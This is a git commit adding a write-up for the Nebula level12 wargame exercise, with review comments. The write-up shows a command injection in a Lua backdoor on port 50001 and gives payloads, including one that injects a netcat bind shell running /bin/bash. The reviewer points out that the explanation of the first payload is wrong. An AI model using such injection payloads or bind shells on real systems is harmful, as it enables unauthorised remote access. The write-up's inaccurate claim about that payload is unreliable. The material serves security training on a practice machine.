Commit 4be24ea

Richard Luby <richluby@gmail.com>
2016-10-12 08:57:29
added solution for level 12
level twelve has a command injection vulnerability for unsanitized user input passed to a system call
1 parent dd9d69e
Changed files (2)
exploit_exercises
exploit_exercises/nebula/level12/readme.md
@@ -1,11 +1,14 @@
 
-----------------------------------------------
+# Nebula - Level12 - Backdoor Program
+
+## About
 
-About
-Source code
 There is a backdoor process listening on port 50001.
-To do this level, log in as the level12 account with the password
-level12. Files for this level can be found in /home/flag12.
+To do this level, log in as the `level12` account with the password
+`level12`. Files for this level can be found in `/home/flag12`.
+
+## Source code
+```
 local socket = require("socket")
 local server = assert(socket.bind("127.0.0.1", 50001))
 
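Review bot: the code fence opened just before the Lua listing (`+```` followed by `local socket = require("socket")`) has no language tag; tag it as ```` ```lua ```` so the `## Source code` block renders with highlighting and the reader can see at a glance what language the backdoor is written in. The rest of the restructuring (title, `## About`, backticked `level12` and `/home/flag12`) reads fine.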
@@ -39,3 +42,20 @@ while 1 do
 
   client:close()
 end
+```
+
+## Solution
+
+Note the line `prog = io.popen("echo "..password.." | sha1sum", "r")`. `password` is supplied by the
+user without any form of sanitization. This allows the attacker to enter
+`echo "4754a4f4bd5787accd33de887b9250a0691dd198#" | nc 127.0.0.1 50001` as the password, which
+comments the rest of the line and simply returns the hash. But what if we do not have the hash?
+
+The lack of sanitization allows any arbitrary command sequence to be entered. Ergo, we can establish
+a binding `nc` shell. To do this, use
+
+```
+echo '""; nc.traditional -lkp 5002 -e /bin/bash; #' | nc 127.0.0.1 50001
+```
+
+Connect to the shell with `nc 127.0.0.1 5002`.
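Review bot: the explanation of the first payload does not match the payload as written. In `4754a4f4bd5787accd33de887b9250a0691dd198#` the `#` is glued onto the hash, and in sh a `#` only begins a comment at the start of a word, so the resulting `echo <hash># | sha1sum` would still pipe through `sha1sum` rather than "comment the rest of the line and simply return the hash"; either reword that sentence or make the payload match what the text claims. The `## Solution` section would also benefit from one sentence on the root cause and fix: the problem is that `io.popen("echo "..password.." | sha1sum", "r")` builds a shell command line by string concatenation from untrusted input, so the remediation is to keep user input out of the shell entirely (compute the SHA-1 in-process, or at the very least reject anything that does not match a strict allow-list such as `^%x+$` before the call), which is the lesson this level is meant to teach. Minor wording: "a binding `nc` shell" should read "a `nc` bind shell".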
exploit_exercises/nebula/completions.md
@@ -3,4 +3,4 @@
 Handle               |Level00 |Level01 |Level02 |Level03 |Level04 |Level05 |Level06 |Level07 |Level08 |Level09 |Level10 |Level11 |Level12 |Level13 |Level14 |Level15 |Level16 |Level17 |Level18 |Level19
 ---------------------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|--------|-------
 **bryfry**           | [x]    |        | [x]    |        | [x]    |        | [x]    |        |        |        |        |        |        |        |        |        |        |        |        |        
-**richluby**         |        | [x]    |        | [x]    |        | [x]    |        | [x]    |        | [x]    | [x]    | [x]    |        |        |        |        |        |        |        |        
+**richluby**         |        | [x]    |        | [x]    |        | [x]    |        | [x]    |        | [x]    | [x]    | [x]    | [x]    |        |        |        |        |        |        |